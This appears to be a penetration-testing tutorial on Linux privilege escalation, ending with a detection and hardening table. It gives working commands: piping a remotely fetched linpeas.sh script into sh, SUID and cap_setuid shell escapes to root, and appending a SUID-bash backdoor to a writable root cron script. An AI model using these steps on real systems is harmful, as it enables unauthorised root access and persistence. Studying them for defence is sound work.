Linux Privilege Escalation: Exploiting Misconfigurations in Production Environments

Systematic approach to identifying and exploiting common Linux privilege escalation vectors including SUID binaries, capabilities, and cron misconfigurations.

Sivabalan Chandra Sekaran2 min read

Methodology

Effective privilege escalation on Linux follows an enumerate-then-exploit workflow. Automated tools accelerate discovery, but manual validation prevents false positives from noisy output.

Initial Enumeration

#!/bin/bash
# Quick privilege escalation checks
id
sudo -l 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.* 2>/dev/null

Tools like LinPEAS and Linux Exploit Suggester complement manual checks:

curl -L linpeas.sh | sh
# Or run from local copy in restricted environments
./linpeas.sh -a

SUID Binary Abuse

World-writable SUID binaries are rare but critical findings:

find / -perm -4000 -type f 2>/dev/null | xargs ls -la

Example: find with SUID bit allows shell escape:

find . -exec /bin/sh -p \; -quit

Reference GTFOBins for binary-specific techniques.

Linux Capabilities

Capabilities provide granular privileges without full root:

getcap -r / 2>/dev/null
# Example output:
# /usr/bin/python3.8 = cap_setuid+ep

Python with cap_setuid enables immediate root:

import os
os.setuid(0)
os.system("/bin/bash")

Cron Job Misconfigurations

Writable cron scripts running as root:

# Find world-writable cron entries
find /etc/cron* -type f -perm -o+w 2>/dev/null
ls -la /var/spool/cron/crontabs/

If /opt/backup/backup.sh is writable and runs as root via cron:

echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/backup/backup.sh
# Wait for cron execution, then:
/tmp/rootbash -p

Kernel Exploits

Always verify kernel version before attempting exploits:

uname -a
cat /proc/version
searchsploit linux kernel $(uname -r)

Note: Kernel exploits should be last resort — they risk system instability and are easily detected.

Detection & Hardening

VectorDetectionMitigation
SUIDAuditd on SUID executionRemove unnecessary SUID bits
CapabilitiesMonitor setuid syscallsDrop capabilities with setcap -r
CronFile integrity monitoringRestrict write permissions
Writable /etc/passwdFIM alertsProper file permissions

References

  1. GTFOBins
  2. Linux Privilege Escalation — HackTricks

Share this research

Related Research